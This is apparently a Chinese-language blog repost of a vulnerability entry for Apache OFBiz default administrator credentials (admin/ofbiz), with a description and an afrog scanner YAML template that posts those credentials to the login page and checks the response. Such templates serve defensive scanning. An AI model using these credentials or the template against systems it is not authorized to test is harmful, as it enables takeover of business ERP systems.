Apache OfBiz Default Login Vulnerability

漏洞信息

漏洞名称: Apache OfBiz Default Login Vulnerability

漏洞类型: 弱口令

漏洞等级: 高危

漏洞描述: Apache OfBiz是一个开源的企业资源规划(ERP)系统,提供了一系列的企业级应用,包括会计、制造、库存管理等。它广泛应用于各种规模的企业中,因其灵活性和可扩展性而受到欢迎。该漏洞涉及Apache OfBiz系统的默认登录凭证问题,具体表现为系统安装后保留了默认的用户名和密码(admin/ofbiz),这使得攻击者可以轻易地通过默认凭证登录系统,获取管理员权限。这种弱口令问题源于系统安装过程中未强制要求用户更改默认凭证,或者未在安装后提醒用户进行修改。攻击者利用此漏洞可以完全控制受影响的系统,执行任意操作,如数据泄露、服务中断等。由于这是一个默认凭证问题,攻击者无需任何认证即可利用此漏洞,且可以自动化地进行攻击,因此对系统的安全构成了严重威胁。

产品厂商: Apache

产品名称: Apache OfBiz

来源: https://github.com/zan8in/afrog/blob/b9686a5c4553da942d9b8736d91cd87b6ee026b1/pocs%2Fafrog-pocs%2Fdefault-pwd%2Fofbiz-default-password.yaml

类型: zan8in/afrog:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

id: ofbiz-default-password

info:
name: Apache OfBiz Default Login
author: pdteam
severity: high
verified: false

rules:
r0:
request:
method: POST
path: /control/login
body: USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
expression: |
(response.status == 200 || response.status == 302) && response.body.bcontains(b'ofbiz-pagination-template') && response.body.bcontains(b'<span>Powered by OFBiz</span>') && !response.body.bcontains(b'user login id "admin" has been disabled')
expression: r0()



Apache OfBiz Default Login Vulnerability
http://example.com/2025/07/25/github_850453752/
作者
lianccc
发布于
2025年7月25日
许可协议